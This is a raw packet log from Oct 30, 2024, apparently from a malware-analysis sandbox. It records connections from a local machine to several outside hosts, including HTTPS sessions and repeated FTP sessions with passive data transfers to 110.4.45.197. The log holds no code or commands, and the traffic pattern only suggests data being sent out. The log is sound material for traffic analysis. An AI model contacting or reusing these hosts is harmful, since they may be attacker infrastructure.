Oct 30, 2024 08:34:59.872637987 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.872742891 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.872807980 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.872896910 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.872958899 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.873037100 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.873102903 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.877638102 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.877708912 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.877887964 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.877948046 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878040075 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878171921 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.878171921 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.878173113 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.878180981 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878247976 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878319025 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.878326893 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878431082 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878492117 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.878500938 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878571987 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878632069 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.878638983 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878767967 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878824949 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.878834963 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.878988981 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.879041910 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.879053116 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.879060030 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.879096031 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.879106045 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.879199982 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.879266977 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.879290104 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.879362106 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.879369020 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.879427910 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.880003929 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.880062103 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.880067110 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.880073071 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.880111933 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.880120993 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.880177975 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.880186081 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.880240917 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.880328894 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.880384922 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.880770922 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.880832911 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.905061007 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.905215979 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
Oct 30, 2024 08:34:59.905236959 CET | 49731 | 443 | 192.168.2.4 | 50.116.93.185
Oct 30, 2024 08:34:59.905245066 CET | 443 | 49731 | 50.116.93.185 | 192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.905277014 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.905297041 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.905376911 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.905438900 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991076946 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991219997 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991238117 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991245985 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991280079 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991317034 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991389990 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991466999 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991895914 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.991985083 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.991996050 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992070913 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992104053 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992177963 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992484093 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992566109 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992621899 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992691040 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992753029 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992834091 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.992923975 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.992991924 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.993124008 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.993200064 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.993449926 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.993520975 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.993622065 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.993696928 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.993915081 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.993982077 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994128942 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.994201899 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994256020 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.994324923 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994431973 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.994509935 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994662046 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.994733095 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.994990110 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995058060 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.995168924 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995255947 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.995470047 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995537996 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.995665073 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995738029 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.995862961 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.995939016 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996023893 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996109009 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996227026 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996305943 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996407032 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996478081 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996566057 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996644974 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996678114 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996745110 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.996846914 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.996917009 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997011900 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997100115 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997162104 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997234106 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997339964 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997417927 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997468948 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997540951 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997612000 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997689962 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:34:59.997740030 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:34:59.997811079 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.024378061 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.024487972 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.024525881 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.024652958 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.024704933 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.024713039 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.024722099 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.024756908 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.110094070 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110204935 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.110358000 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110510111 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.110764980 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110824108 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.110830069 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110856056 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.110907078 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.113399982 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.113418102 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:00.113428116 CET49731443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:00.113432884 CET4434973150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.148466110 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.148504972 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.148561954 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.162122965 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.162142038 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.774816990 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.774882078 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.780165911 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.780178070 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.780455112 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:06.843198061 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:06.887340069 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:07.017381907 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:07.017477989 CET44349732172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:07.017785072 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:07.023035049 CET49732443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:08.532341957 CET4973321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.537884951 CET2149733110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:08.540617943 CET4973321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.543725014 CET4973321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.549216986 CET2149733110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:08.549719095 CET4973321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.638937950 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:08.646059990 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:08.646141052 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:09.569416046 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:09.569741011 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:09.575126886 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:09.908655882 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:09.908821106 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:09.914218903 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.273730040 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.273893118 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:10.279398918 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.612694979 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.612874985 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:10.618274927 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.951411963 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:10.951900005 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:10.958168030 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.290183067 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.290445089 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:11.295870066 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.628808975 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.629463911 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:11.634876013 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.634948969 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:11.635008097 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:11.640415907 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.658726931 CET49736443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.658757925 CET4434973650.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.658868074 CET49736443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.658962965 CET49736443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.658994913 CET4434973650.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.659056902 CET49736443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.677764893 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.677813053 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:11.677891970 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.679347038 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:11.679363012 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.342667103 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.342750072 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.344024897 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.344037056 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.344285011 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.387002945 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.417752981 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:12.459336996 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.535938025 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.539211035 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:12.539211035 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:12.544931889 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.544944048 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.544953108 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.545490980 CET5070749735110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.547611952 CET4973550707192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:12.578684092 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:12.578715086 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.191991091 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192042112 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.192142963 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192194939 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.192342043 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192404032 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.192410946 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192454100 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.192495108 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.193481922 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.193499088 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.193520069 CET49737443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:13.193526030 CET4434973750.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.251085043 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.295994997 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:13.341002941 CET4973855553192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:13.346364975 CET5555349738110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:13.346421957 CET4973855553192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:13.348221064 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:13.353487015 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:14.264015913 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:14.264195919 CET4973855553192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:14.270169973 CET5555349738110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:14.270309925 CET4973855553192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:14.314985991 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:14.599478960 CET2149734110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:14.649988890 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:17.102197886 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.102242947 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.102365017 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.112234116 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.112251043 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.710941076 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.711061001 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.712603092 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.712614059 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.712860107 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.785811901 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.793137074 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.835345030 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.964560986 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.964631081 CET44349740172.67.74.152192.168.2.4
                                                                                            Oct 30, 2024 08:35:17.964765072 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:17.967678070 CET49740443192.168.2.4172.67.74.152
                                                                                            Oct 30, 2024 08:35:19.946712017 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:19.952384949 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:19.952461958 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:19.983376026 CET4973421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:20.865628004 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:20.865926981 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:20.871320963 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.207725048 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.208947897 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:21.214421034 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.581561089 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.585005999 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:21.590488911 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.926707029 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:21.926950932 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:21.932286978 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.269224882 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.269404888 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.274812937 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.611031055 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.614164114 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.619565010 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.956015110 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.956649065 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.962532043 CET5460149747110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:22.962678909 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.962696075 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:22.968097925 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:23.899625063 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:23.900856018 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:23.900856018 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:23.906374931 CET5460149747110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:23.906940937 CET5460149747110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:23.907031059 CET4974754601192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:23.942132950 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.250138044 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:24.307506084 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.370490074 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.545617104 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:24.883752108 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:24.884253025 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.891036034 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:24.891144991 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:24.891191006 CET4974421192.168.2.4110.4.45.197
